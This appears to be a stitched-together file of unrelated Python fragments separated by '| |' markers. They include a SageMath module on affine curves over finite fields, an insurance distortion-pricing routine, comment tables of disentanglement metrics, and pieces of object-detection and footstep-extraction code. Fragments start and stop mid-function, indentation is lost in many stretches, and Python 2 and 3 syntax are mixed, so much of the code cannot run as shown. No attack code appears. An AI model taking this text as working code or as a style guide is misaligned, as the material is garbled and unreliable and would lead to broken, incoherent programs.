            cv2.putText(img_save, signname, (bbox[0]-3, bbox[1]-5), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,255,0), 2)
            idx = idx + 1
    return img_handle, img_save, categroy_dict, select_res
def detectOneImg(prefix, epoch, batch_size, model, img, collect, test_mode="onet",
thresh=[0.6, 0.6, 0.7], min_face_size=24,
stride=2, slide_window=False, shuffle=False, vis=False):
detectors = [None, None, None]
#load densenet for classfication
tf.reset_default_graph()
model.load_model()
model_path = ['%s-%s'%(x,y) for x,y in zip(prefix, epoch)] # meta图、data变量数据、index键值关系、checkpoint信息
| |
"""
Affine plane curves over a general ring
AUTHORS:
- <NAME> (2005-11-13)
- <NAME> (2005-11-13)
- <NAME> (2006-01)
"""
#*****************************************************************************
# Copyright (C) 2005 <NAME> <<EMAIL>>
#
# Distributed under the terms of the GNU General Public License (GPL)
#
# The full text of the GPL is available at:
#
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.interfaces.all import singular
from sage.misc.all import add
from sage.rings.all import degree_lowest_rational_function
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.schemes.affine.affine_space import is_AffineSpace
from sage.schemes.generic.algebraic_scheme import AlgebraicScheme_subscheme_affine
from curve import Curve_generic
class AffineSpaceCurve_generic(Curve_generic, AlgebraicScheme_subscheme_affine):
    """A curve (one-dimensional subscheme) in an affine space of arbitrary
    dimension, cut out by the polynomials ``X``.

    Fix: use the Python-3-compatible ``raise Exc(msg)`` form (also valid in
    Python 2) instead of the Python-2-only ``raise Exc, msg`` syntax.
    """
    def _repr_type(self):
        # Used by the generic repr machinery: "Affine Space Curve ...".
        return "Affine Space"

    def __init__(self, A, X):
        """Create the curve in ambient space ``A`` defined by the equations
        ``X``; raises unless the resulting scheme has dimension 1."""
        if not is_AffineSpace(A):
            raise TypeError("A (=%s) must be an affine space"%A)
        Curve_generic.__init__(self, A, X)
        d = self.dimension()
        if d != 1:
            raise ValueError("defining equations (=%s) define a scheme of dimension %s != 1"%(X,d))
class AffineCurve_generic(Curve_generic):
def __init__(self, A, f):
P = f.parent()
if not (is_AffineSpace(A) and A.dimension != 2):
raise TypeError, "Argument A (= %s) must be an affine plane."%A
Curve_generic.__init__(self, A, [f])
def _repr_type(self):
return "Affine"
def divisor_of_function(self, r):
"""
Return the divisor of a function on a curve.
INPUT: r is a rational function on X
OUTPUT:
- ``list`` - The divisor of r represented as a list of
coefficients and points. (TODO: This will change to a more
structural output in the future.)
EXAMPLES::
sage: F = GF(5)
sage: P2 = AffineSpace(2, F, names = 'xy')
sage: R = P2.coordinate_ring()
sage: x, y = R.gens()
sage: f = y^2 - x^9 - x
sage: C = Curve(f)
sage: K = FractionField(R)
sage: r = 1/x
sage: C.divisor_of_function(r) # todo: not implemented (broken)
[[-1, (0, 0, 1)]]
sage: r = 1/x^3
sage: C.divisor_of_function(r) # todo: not implemented (broken)
[[-3, (0, 0, 1)]]
"""
F = self.base_ring()
f = self.defining_polynomial()
pts = self.places_on_curve()
numpts = len(pts)
R = f.parent()
x,y = R.gens()
R0 = PolynomialRing(F,3,names = [str(x),str(y),"t"])
vars0 = R0.gens()
t = vars0[2]
divf = []
for pt0 in pts:
if pt0[2] != F(0):
lcs = self.local_coordinates(pt0,5)
yt = lcs[1]
xt = lcs[0]
ldg = degree_lowest_rational_function(r(xt,yt),t)
if ldg[0] != 0:
divf.append([ldg[0],pt0])
return divf
def local_coordinates(self, pt, n):
r"""
Return local coordinates to precision n at the given point.
Behaviour is flaky - some choices of `n` are worst that
others.
INPUT:
- ``pt`` - an F-rational point on X which is not a
point of ramification for the projection (x,y) - x.
- ``n`` - the number of terms desired
OUTPUT: x = x0 + t y = y0 + power series in t
EXAMPLES::
sage: F = GF(5)
sage: pt = (2,3)
sage: R = PolynomialRing(F,2, names = ['x','y'])
sage: x,y = R.gens()
sage: f = y^2-x^9-x
sage: C = Curve(f)
sage: C.local_coordinates(pt, 9)
[t + 2, -2*t^12 - 2*t^11 + 2*t^9 + t^8 - 2*t^7 - 2*t^6 - 2*t^4 + t^3 - 2*t^2 - 2]
"""
f = self.defining_polynomial()
R = f.parent()
F = self.base_ring()
p = F.characteristic()
x0 = F(pt[0])
y0 = F(pt[1])
astr = ["a"+str(i) for i in range(1,2*n)]
x,y = R.gens()
R0 = PolynomialRing(F,2*n+2,names = [str(x),str(y),"t"]+astr)
vars0 = R0.gens()
t = vars0[2]
yt = y0*t**0+add([vars0[i]*t**(i-2) for i in range(3,2*n+2)])
xt = x0+t
ft = f(xt,yt)
S = singular
S.eval('ring s = '+str(p)+','+str(R0.gens())+',lp;')
S.eval('poly f = '+str(ft) + ';')
c = S('coeffs(%s, t)'%ft)
N = int(c.size())
b = ["%s[%s,1],"%(c.name(), i) for i in range(2,N/2-4)]
b = ''.join(b)
b = b[:len(b)-1] # to cut off the trailing comma
cmd = 'ideal I = '+b
S.eval(cmd)
S.eval('short=0') # print using *'s and ^'s.
c = S.eval('slimgb(I)')
d = c.split("=")
d = d[1:]
d[len(d)-1] += "\n"
e = [x[:x.index("\n")] for x in d]
vals = []
for x in e:
for y in vars0:
if str(y) in x:
if len(x.replace(str(y),"")) != 0:
i = x.find("-")
if i>0:
vals.append([eval(x[1:i]),x[:i],F(eval(x[i+1:]))])
i = x.find("+")
if i>0:
vals.append([eval(x[1:i]),x[:i],-F(eval(x[i+1:]))])
else:
vals.append([eval(str(y)[1:]),str(y),F(0)])
vals.sort()
k = len(vals)
v = [x0+t,y0+add([vals[i][2]*t**(i+1) for i in range(k)])]
return v
def plot(self, *args, **kwds):
    r"""
    Plot the real points on this affine plane curve.

    INPUT:

    - ``self`` - an affine plane curve

    - ``*args`` - optional tuples (variable, minimum, maximum) for
      plotting dimensions

    - ``**kwds`` - optional keyword arguments passed on to
      ``implicit_plot``

    EXAMPLES:

    A cuspidal curve::

        sage: R.<x, y> = QQ[]
        sage: C = Curve(x^3 - y^2)
        sage: C.plot()

    A 5-nodal curve of degree 11. This example also illustrates
    some of the optional arguments::

        sage: R.<x, y> = ZZ[]
        sage: C = Curve(32*x^2 - 2097152*y^11 + 1441792*y^9 - 360448*y^7 + 39424*y^5 - 1760*y^3 + 22*y - 1)
        sage: C.plot((x, -1, 1), (y, -1, 1), plot_points=400)

    A line over `\mathbf{RR}`::

        sage: R.<x, y> = RR[]
        sage: C = Curve(R(y - sqrt(2)*x))
        sage: C.plot()
    """
    # Plotting is delegated entirely to the defining ideal of the curve.
    return self.defining_ideal().plot(*args, **kwds)
class AffineCurve_finite_field(AffineCurve_generic):
    def rational_points(self, algorithm="enum"):
        r"""
        Return the sorted list of all rational points on this curve.

        Uses *very* naive point enumeration: every pair of elements of the
        base field is tested against the defining equation.

        EXAMPLE::

            sage: A, (x,y) = AffineSpace(2,GF(9,'a')).objgens()
            sage: C = Curve(x^2 + y^2 - 1)
            sage: C
            Affine Curve over Finite Field in a of size 3^2 defined by x0^2 + x1^2 - 1
            sage: C.rational_points()
            [(0, 1), (0, 2), (1, 0), (2, 0), (a + 1, a + 1), (a + 1, 2*a + 2), (2*a + 2, a + 1), (2*a + 2, 2*a + 2)]
        """
        f = self.defining_polynomial()
        K = f.parent().base_ring()
        # Exhaustively test all |K|^2 candidate points against f
        solutions = [self((a, b)) for a in K for b in K if f(a, b) == 0]
        solutions.sort()
        return solutions
class AffineCurve_prime_finite_field(AffineCurve_finite_field):
# CHECK WHAT ASSUMPTIONS ARE MADE REGARDING AFFINE VS. PROJECTIVE MODELS!!!
# THIS IS VERY DIRTY STILL -- NO DATASTRUCTURES FOR DIVISORS.
def riemann_roch_basis(self, D):
    r"""
    Interfaces with Singular's BrillNoether command.

    INPUT:

    - ``self`` - a plane curve defined by a polynomial eqn f(x,y)
      = 0 over a prime finite field F = GF(p) in 2 variables x,y
      representing a curve X: f(x,y) = 0 having n F-rational
      points (see the Sage function places_on_curve)

    - ``D`` - an n-tuple of integers
      `(d1, ..., dn)` representing the divisor
      `Div = d1*P1+...+dn*Pn`, where
      `X(F) = \{P1,...,Pn\}`.

      *The ordering is that dictated by places_on_curve.*

    OUTPUT: basis of L(Div)

    EXAMPLE::

        sage: R = PolynomialRing(GF(5),2,names = ["x","y"])
        sage: x, y = R.gens()
        sage: f = y^2 - x^9 - x
        sage: C = Curve(f)
        sage: D = [6,0,0,0,0,0]
        sage: C.riemann_roch_basis(D)
        [1, (y^2*z^4 - x*z^5)/x^6, (y^2*z^5 - x*z^6)/x^7, (y^2*z^6 - x*z^7)/x^8]
    """
    f = self.defining_polynomial()
    R = f.parent()
    F = self.base_ring()
    p = F.characteristic()
    # The divisor as a Singular intvec: one multiplicity per rational place
    G = singular(','.join(str(x) for x in D), type='intvec')
    singular.LIB('brnoeth.lib')
    # Set up a Singular ring matching the curve's polynomial ring
    S = singular.ring(p, R.gens(), 'lp')
    fsing = singular(str(f))
    # Brill-Noether machinery: adjoint divisor, then the non-singular places
    X = fsing.Adj_div()
    P = singular.NSplaces(1, X)
    T = P[1][2]
    T.set_ring()
    LG = G.BrillNoether(P)
    dim = len(LG)
    # Each basis element comes back from Singular as a (numerator, denominator) pair
    basis = [(LG[i][1], LG[i][2]) for i in range(1, dim + 1)]
    x, y, z = PolynomialRing(F, 3, names=["x", "y", "z"]).gens()
    V = []
    for g in basis:
        T.set_ring()  # Singular's active ring must be restored before reading each element
        # NOTE(review): eval() runs on strings produced by Singular (trusted output)
        V.append(eval(g[0].sage_polystring()) / eval(g[1].sage_polystring()))
    return V
def rational_points(self, algorithm="enum"):
r"""
Return sorted list of all rational points on this curve.
INPUT:
- ``algorithm`` - string:
+ ``'enum'`` - straightforward enumeration
+ ``'bn'`` - via Singular's Brill-Noether package.
+ ``'all'`` - use all implemented algorithms and
verify that they give the same answer, then return it
.. note::
The Brill-Noether package does not always work. When it
fails a RuntimeError exception is raised.
EXAMPLE::
sage: x, y = (GF(5)['x,y']).gens()
sage: f = y^2 - x^9 - x
sage: C = Curve(f); C
Affine Curve over Finite Field of size 5 defined by -x^9 + y^2 - x
sage: C.rational_points(algorithm='bn')
[(0, 0), (2, 2), (2, 3), (3, 1), (3, 4)]
sage: C = Curve(x - y + 1)
sage: C.rational_points()
[(0, 1), (1, 2), (2, 3), (3, 4), (4, 0)]
We compare Brill-Noether and enumeration::
sage: x, y = (GF(17)['x,y']).gens()
sage: C = Curve(x^2 + y^5 + x*y - 19)
sage: v = C.rational_points(algorithm='bn')
sage: w = C.rational_points(algorithm='enum')
sage: len(v)
20
sage: v == w
True
"""
if algorithm == "enum":
return AffineCurve_finite_field.rational_points(self, algorithm="enum")
elif algorithm == "bn":
f = self.defining_polynomial()._singular_()
singular | |
* 3 + 5
# bit = np.cumsum(test['y'][::-1])
# test['z'] = bit
# test['w'] = bit / test.a
# test
#
# df[f'exag_{line}'] = exleaUC + exixgtaUC * self.density_df.loss + mass
# df[f'exag1_{line}'] = exleaUC1 + exixgtaUC * self.density_df.loss + mass
# is this ever used?
# df[f'exleag_{line}'] = exleaUC / df.gF
# df[f'exleag1_{line}'] = exleaUC1 / df.gF
#
# again, exi_xgtag is super important, so we will compute it bare bones the same way as exi_xgta
# df[f'exi_xgtag_{line}'] = exixgtaUC / df.gS
#
#
# df['exi_xgtag_' + line] = ((df[f'exeqa_{line}'] / df.loss *
# df.gp_total).shift(-1)[::-1].cumsum()) / df.gp_total.shift(-1)[::-1].cumsum()
# exa uses S in the denominator...and actually checking values there is a difference between the sum and gS
#
# May 2020 new treatment of masses
#
mass = ημ_mass = total_mass = 0.
if dist.mass:
# this is John's problem: the last scenario is getting all the weight...
# total_mass is is the "shortfall" in gp_total - it is added at the end; it is not necessary if the
# distribution is actually bounded - then you already pick up the mass
# only need to add masses up to this point - an issue for bounded variables
# mass = total_mass * self.density_df[f'exi_xeqa_{line}'].iloc[idx_ess_sup]
if np.allclose(1.0, df.gp_total.sum()):
logger.info('gp_total sums to 1, mass accounted for in gp_total; no further adjustment needed')
else:
mass = dist.mass * mass_hints[line]
ημ_mass = dist.mass * (np.sum(mass_hints) - mass_hints[line])
total_mass = dist.mass
logger.info(f'sum(gp_total)={df.gp_total.sum():.5g} < 1, setting {line} mass = {mass}')
# original
# df['exi_xgtag_' + line] = ((df[f'exeqa_{line}'] / df.loss *
# df.gp_total).shift(-1)[::-1].cumsum()) / df.gS
# df['exi_xgtag_ημ_' + line] = ((df[f'exeqa_ημ_{line}'] / df.loss *
# df.gp_total).shift(-1)[::-1].cumsum()) / df.gS
# Nov 2020
# shift[-1] because result is for > a, so the first entry sums from bucket 1...
# need the denominator to equal the numerator sum of p values
# the shift up needs to be filled in with the last S value (for the tail) otherwise that probability
# is lost...hence we need to set fill_values:
last_gS = df.gS.iloc[-1]
last_x = df[f'exeqa_{line}'].iloc[-1] / df.loss.iloc[-1] * last_gS
logger.debug(f'Tail adjustment for {line}: {last_x:.6g}')
df['exi_xgtag_' + line] = \
((df[f'exeqa_{line}'] / df.loss * df.gp_total).
shift(-1, fill_value=last_x)[::-1].cumsum() + mass) / (df.gS + total_mass)
# need these to be zero so nan's do not propagate
df.loc[gSeq0, 'exi_xgtag_' + line] = 0.
if not efficient:
last_x = df[f'exeqa_ημ_{line}'].iloc[-1] / df.loss.iloc[-1] * last_gS
df['exi_xgtag_ημ_' + line] = \
((df[f'exeqa_ημ_{line}'] / df.loss * df.gp_total).
shift(-1, fill_value=last_x)[::-1].cumsum() + ημ_mass) / (df.gS + total_mass)
df.loc[gSeq0, 'exi_xgtag_ημ_' + line] = 0.
#
#
# following the Audit Vignette this is the way to go:
# in fact, need to shift both down because cumint (prev just gS, but int beta g...integrands on same
# basis
# df[f'exag_{line}'] = (df[f'exi_xgtag_{line}'].shift(1) * df.gS.shift(1)).cumsum() * self.bs
# df[f'exag_ημ_{line}'] = (df[f'exi_xgtag_ημ_{line}'].shift(1) * df.gS.shift(1)).cumsum() * self.bs
# np.allclose(
# (df[f'exi_xgtag_{line}'].shift(1, fill_value=0) * df.gS.shift(1, fill_value=0)).cumsum() * self.bs,
# (df[f'exi_xgtag_{line}'] * df.gS).shift(1, fill_value=0).cumsum() * self.bs)
# Doh
df[f'exag_{line}'] = (df[f'exi_xgtag_{line}'] * df.gS).shift(1, fill_value=0).cumsum() * self.bs
if not efficient:
df[f'exag_ημ_{line}'] = (df[f'exi_xgtag_ημ_{line}'] * df.gS).shift(1, fill_value=0).cumsum() * self.bs
# maybe sometime you want this unchecked item?
# df[f'exleag_1{line}'] = np.cumsum( df[f'exeqa_{line}'] * df.p_total )
# it makes a difference NOT to divide by df.gS but to compute the actual weights you are using (you mess
# around with the last weight)
#
#
#
# these are all here for debugging...see
# C:\S\TELOS\spectral_risk_measures_monograph\spreadsheets\[AS_IJW_example.xlsx]
# df[f'exag1_{line}'] = exleaUC + exixgtaUC1 * self.density_df.loss + mass
# df[f'exi_xgtag1_{line}'] = exixgtaUC1 / df.gS
# df[f'exleaUC_{line}'] = exleaUC
# df[f'exleaUCcs_{line}'] = exleaUCcs
# df[f'U_{line}'] = exixgtaUC
# df[f'U1_{line}'] = exixgtaUC1
# df[f'RAW_{line}'] = self.density_df.loc[::-1, f'exeqa_{line}'] / self.density_df.loc[::-1, 'loss'] * \
# df.loc[::-1, 'gp_total']
if efficient:
# need to get to T.M and T.Q for pricing... laser in on those...
# duplicated and edited code from below
df['exag_total'] = df.gS.shift(1, fill_value=0).cumsum() * self.bs
df['M.M_total'] = (df.gS - df.S)
df['M.Q_total'] = (1 - df.gS)
# hummmm.aliases, but...?
# df['M.L_total'] = df['S']
# df['M.P_total'] = df['gS']
# df['T.L_total'] = df['exa_total']
# df['T.P_total'] = df['exag_total']
# critical insight is the layer ROEs are the same for all lines by law invariance
# lhopital's rule estimate of g'(1) = ROE(1)
# this could blow up...
ϵ = 1e-10
gprime1 = (g(1 - ϵ) - (1 - ϵ)) / (1 - g(1 - ϵ))
df['M.ROE_total'] = np.where(df['M.Q_total']!=0,
df['M.M_total'] / df['M.Q_total'],
gprime1)
# where is the ROE zero? need to handle separately else Q will blow up
roe_zero = (df['M.ROE_total'] == 0.0)
# print(f"g'(0)={gprime1:.5f}\nroe zero vector {roe_zero}")
for line in self.line_names_ex:
report_time(f'apply_distortion - starting {line} efficient loop')
df[f'T.M_{line}'] = df[f'exag_{line}'] - df[f'exa_{line}']
mm_l = df[f'T.M_{line}'].diff().shift(-1) / self.bs
# careful about where ROE==0
mq_l = mm_l / df['M.ROE_total']
mq_l.iloc[-1] = 0
mq_l.loc[roe_zero] = np.nan
df[f'T.Q_{line}'] = mq_l.shift(1).cumsum() * self.bs
df.loc[0, f'T.Q_{line}'] = 0
if create_augmented:
self.augmented_df = df
return Answer(augmented_df=df)
# sum of parts: careful not to include the total twice!
# not used
# df['exag_sumparts'] = df.filter(regex='^exag_[^η]').sum(axis=1)
# LEV under distortion g
# originally
# df['exag_total'] = self.cumintegral(df['gS'])
# revised cumintegral does: v.shift(1, fill_value=0).cumsum() * bs
df['exag_total'] = df.gS.shift(1, fill_value=0).cumsum() * self.bs
# df.loc[0, 'exag_total'] = 0
# comparison of total and sum of parts
# Dec 2019 added info to compute the total margin and capital allocation by layer
# [MT].[L LR Q P M]_line: marginal or total (ground-up) loss, loss ratio etc.
# do NOT divide MARGINAL versions by bs because they are per 1 wide layer
# df['lookslikemmtotalxx'] = (df.gS - df.S)
df['M.M_total'] = (df.gS - df.S)
df['M.Q_total'] = (1 - df.gS)
# hummmm.aliases, but...?
df['M.L_total'] = df['S']
df['M.P_total'] = df['gS']
# df['T.L_total'] = df['exa_total']
# df['T.P_total'] = df['exag_total']
# critical insight is the layer ROEs are the same for all lines by law invariance
# lhopital's rule estimate of g'(1) = ROE(1)
# this could blow up... TODO extend Distortion class to return gprime1
ϵ = 1e-10
gprime1 = (g(1 - ϵ) - (1 - ϵ)) / (1 - g(1 - ϵ))
df['M.ROE_total'] = np.where(df['M.Q_total']!=0,
df['M.M_total'] / df['M.Q_total'],
gprime1)
# where is the ROE zero? need to handle separately else Q will blow up
roe_zero = (df['M.ROE_total'] == 0.0)
report_time('apply_distortion - first line loop complete')
# print(f"g'(0)={gprime1:.5f}\nroe zero vector {roe_zero}")
for line in self.line_names_ex:
report_time(f'apply_distortion - starting {line} loop 2')
# these are not used
# df[f'exa_{line}_pcttotal'] = df['exa_' + line] / df.exa_total
# df[f'exag_{line}_pcttotal'] = df['exag_' + line] / df.exag_total
# hummm more aliases
df[f'T.L_{line}'] = df[f'exa_{line}']
df[f'T.P_{line}'] = df[f'exag_{line}']
df.loc[0, f'T.P_{line}'] = 0
# TOTALs = ground up cumulative sums
# exag is the layer (marginal) premium and exa is the layer (marginal) loss
df[f'T.LR_{line}'] = df[f'exa_{line}'] / df[f'exag_{line}']
df[f'T.M_{line}'] = df[f'exag_{line}'] - df[f'exa_{line}']
df.loc[0, f'T.M_{line}'] = 0
# MARGINALs
# MM should be per unit width layer so need to divide by bs
# prepend=0 satisfies: if
# d['B'] = d.A.cumsum()
# d['C'] = np.diff(d.B, prepend=0)
# then d.C == d.A, which is what you want.
# note this overwrites M.M_total set above
# T.M starts at zero, by previous line and sense: no assets ==> no prem or loss
# old
# df[f'M.M_{line}'] = np.diff(df[f'T.M_{line}'], prepend=0) / self.bs
# new:
df[f'M.M_{line}'] = df[f'T.M_{line}'].diff().shift(-1) / self.bs
# careful about where ROE==0
df[f'M.Q_{line}'] = df[f'M.M_{line}'] / df['M.ROE_total']
df[f'M.Q_{line}'].iloc[-1] = 0
df.loc[roe_zero, f'M.Q_{line}'] = np.nan
# WHAT IS THE LAYER AT ZERO? Should it have a price? What is that price?
# TL and TP at zero are both 1
if line != 'total':
df[f'M.L_{line}'] = df[f'exi_xgta_{line}'] * df['S']
df[f'M.P_{line}'] = df[f'exi_xgtag_{line}'] * df['gS']
df[f'M.LR_{line}'] = df[f'M.L_{line}'] / df[f'M.P_{line}']
# for total need to reflect layer width...
# Jan 2020 added shift down
df[f'T.Q_{line}'] = df[f'M.Q_{line}'].shift(1).cumsum() * self.bs
df.loc[0, f'T.Q_{line}'] = 0
df[f'T.ROE_{line}'] = df[f'T.M_{line}'] / df[f'T.Q_{line}']
# leverage
df[f'T.PQ_{line}'] = df[f'T.P_{line}'] / df[f'T.Q_{line}']
df[f'M.PQ_{line}'] = df[f'M.P_{line}'] / df[f'M.Q_{line}']
# in order | |
0.04 & 0.04 & 0.50 & 0.01 & 0.00
# [Cars3d] random & 17568 & 0.56 & 0.13 & 0.15 & 0.54 & 0.10 & 0.04
#
# [Shapes3d] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [Shapes3d] floor_hue & 10 & 0.82 & 0.76 & 0.62 & 0.82 & 0.74 & 0.60
# [Shapes3d] wall_hue & 10 & 0.82 & 0.74 & 0.60 & 0.82 & 0.72 & 0.55
# [Shapes3d] object_hue & 10 & 0.82 & 0.71 & 0.53 & 0.82 & 0.63 & 0.41
# [Shapes3d] scale & 8 & 0.95 & 0.88 & 0.81 & 0.95 & 0.87 & 0.71
# [Shapes3d] shape & 4 & 0.91 & 0.79 & 0.69 & 0.90 & 0.80 & 0.58
# [Shapes3d] orientation & 15 & 0.94 & 0.92 & 0.84 & 0.89 & 0.87 & 0.74
# [Shapes3d] random & 480000 & 0.66 & 0.45 & 0.53 & 0.60 & 0.29 & 0.29
#
# [SmallNorb] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [SmallNorb] category & 5 & 0.75 & 0.53 & 0.44 & 0.73 & 0.47 & 0.15
# [SmallNorb] instance & 5 & 0.73 & 0.52 & 0.37 & 0.73 & 0.51 & 0.10
# [SmallNorb] elevation & 9 & 0.94 & 0.90 & 0.81 & 0.78 & 0.64 & 0.51
# [SmallNorb] rotation & 18 & 0.61 & 0.19 & 0.12 & 0.60 & 0.21 & 0.07
# [SmallNorb] lighting & 6 & 0.64 & 0.29 & 0.07 & 0.64 & 0.28 & 0.07
# [SmallNorb] random & 24300 & 0.54 & 0.14 & 0.10 & 0.54 & 0.14 & 0.07
#
# [DSprites] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [DSprites] shape & 3 & 0.83 & 0.72 & 0.66 & 0.93 & 0.87 & 0.66
# [DSprites] scale & 6 & 0.95 & 0.95 & 0.93 & 0.94 & 0.96 & 0.84
# [DSprites] orientation & 40 & 0.60 & 0.17 & 0.13 & 0.63 & 0.21 & 0.15
# [DSprites] position_x & 32 & 0.90 & 0.75 & 0.66 & 0.99 & 0.83 & 0.63
# [DSprites] position_y & 32 & 0.90 & 0.75 & 0.65 & 0.99 & 0.83 & 0.63
# [DSprites] random & 737280 & 0.64 & 0.38 & 0.43 & 0.66 & 0.36 & 0.29
#
# [XYSquares-1-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-1-8] x_R & 8 & 1.00 & 1.00 & 1.00 & 0.97 & 0.99 & 0.98
# [XYSquares-1-8] random & 262144 & 0.90 & 0.97 & 0.98 & 0.91 & 0.98 & 0.98
#
# [XYSquares-2-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-2-8] x_R & 8 & 0.92 & 0.99 & 0.94 & 0.96 & 0.99 & 0.99
# [XYSquares-2-8] random & 262144 & 0.77 & 0.83 & 0.85 & 0.92 & 0.99 & 0.99
#
# [XYSquares-3-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-3-8] x_R & 8 & 0.84 & 0.95 & 0.86 & 0.96 & 0.99 & 0.99
# [XYSquares-3-8] random & 262144 & 0.68 & 0.73 & 0.75 & 0.92 & 0.99 & 0.99
#
# [XYSquares-4-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-4-8] x_R & 8 & 0.67 & 0.85 & 0.75 & 0.96 & 0.99 & 0.99
# [XYSquares-4-8] random & 262144 & 0.47 & 0.58 & 0.67 & 0.92 & 0.99 & 0.99
#
# [XYSquares-5-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-5-8] x_R & 8 & 0.67 & 0.85 & 0.72 & 0.95 & 0.99 & 0.99
# [XYSquares-5-8] random & 262144 & 0.47 & 0.58 & 0.64 & 0.92 & 0.98 & 0.99
#
# [XYSquares-6-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-6-8] x_R & 8 & 0.67 & 0.85 & 0.67 & 0.96 & 0.98 & 0.98
# [XYSquares-6-8] random & 262144 & 0.47 & 0.58 & 0.61 & 0.90 & 0.97 & 0.98
#
# [XYSquares-7-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-7-8] x_R & 8 & 0.67 & 0.85 & 0.60 & 0.96 & 0.98 & 0.97
# [XYSquares-7-8] random & 262144 & 0.47 & 0.58 & 0.59 & 0.89 & 0.96 & 0.96
#
# [XYSquares-8-8] Factor Name & Factor Size & rsame_ratio (mse) & rank_corr (mse) & linear_corr (mse) & rsame_ratio (aug) & rank_corr (aug) & linear_corr (aug)
# [XYSquares-8-8] x_R & 8 & 0.39 & 0.58 & 0.52 & 0.95 & 0.97 & 0.96
# [XYSquares-8-8] random & 262144 & 0.21 & 0.37 & 0.55 & 0.87 & 0.94 & 0.95
# ========================================================================= #
# Results - Reformatted #
# ========================================================================= #
# [Cars3d] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [Cars3d] elevation & 0.90 & 0.93 & 0.69 & 0.88
# [Cars3d] azimuth & 0.30 & 0.34 & 0.08 & 0.25
# [Cars3d] object_type & 0.04 & 0.04 & 0.00 & 0.01
# [Cars3d] random & 0.15 & 0.13 & 0.04 & 0.10
#
# [Shapes3d] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [Shapes3d] floor_hue & 0.62 & 0.76 & 0.60 & 0.74
# [Shapes3d] wall_hue & 0.60 & 0.74 & 0.55 & 0.72
# [Shapes3d] object_hue & 0.53 & 0.71 & 0.41 & 0.63
# [Shapes3d] scale & 0.81 & 0.88 & 0.71 & 0.87
# [Shapes3d] shape & 0.69 & 0.79 & 0.58 & 0.80
# [Shapes3d] orientation & 0.84 & 0.92 & 0.74 & 0.87
# [Shapes3d] random & 0.53 & 0.45 & 0.29 & 0.29
#
# [SmallNorb] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [SmallNorb] category & 0.44 & 0.53 & 0.15 & 0.47
# [SmallNorb] instance & 0.37 & 0.52 & 0.10 & 0.51
# [SmallNorb] elevation & 0.81 & 0.90 & 0.51 & 0.64
# [SmallNorb] rotation & 0.12 & 0.19 & 0.07 & 0.21
# [SmallNorb] lighting & 0.07 & 0.29 & 0.07 & 0.28
# [SmallNorb] random & 0.10 & 0.14 & 0.07 & 0.14
#
# [DSprites] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [DSprites] shape & 0.66 & 0.72 & 0.66 & 0.87
# [DSprites] scale & 0.93 & 0.95 & 0.84 & 0.96
# [DSprites] orientation & 0.13 & 0.17 & 0.15 & 0.21
# [DSprites] position_x & 0.66 & 0.75 & 0.63 & 0.83
# [DSprites] position_y & 0.65 & 0.75 & 0.63 & 0.83
# [DSprites] random & 0.43 & 0.38 & 0.29 & 0.36
#
# [XYSquares-1-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-1-8] x_R & 1.00 & 1.00 & 0.98 & 0.99
# [XYSquares-1-8] random & 0.98 & 0.97 & 0.98 & 0.98
#
# [XYSquares-2-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-2-8] x_R & 0.94 & 0.99 & 0.99 & 0.99
# [XYSquares-2-8] random & 0.85 & 0.83 & 0.99 & 0.99
#
# [XYSquares-3-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-3-8] x_R & 0.86 & 0.95 & 0.99 & 0.99
# [XYSquares-3-8] random & 0.75 & 0.73 & 0.99 & 0.99
#
# [XYSquares-4-8] Factor Name & linear_corr (mse) & rank_corr (mse) & linear_corr (aug) & rank_corr (aug)
# [XYSquares-4-8] x_R & 0.75 & 0.85 & 0.99 & 0.99
# [XYSquares-4-8] random & | |
for the generated footsteps
footsteps_path: str
# Footsteps scaling factor
footstep_scaling: float
# Time scaling factor
time_scaling: int
# Footsteps list
contact_phase_list: blf.contacts.ContactPhaseList = None
@staticmethod
def build(footsteps_path: str, footstep_scaling: float, time_scaling: int) -> "FootstepsExtractor":
    """Create a FootstepsExtractor for the given footsteps file and scaling factors."""
    extractor = FootstepsExtractor(
        footsteps_path=footsteps_path,
        footstep_scaling=footstep_scaling,
        time_scaling=time_scaling,
    )
    return extractor
def retrieve_contacts(self) -> None:
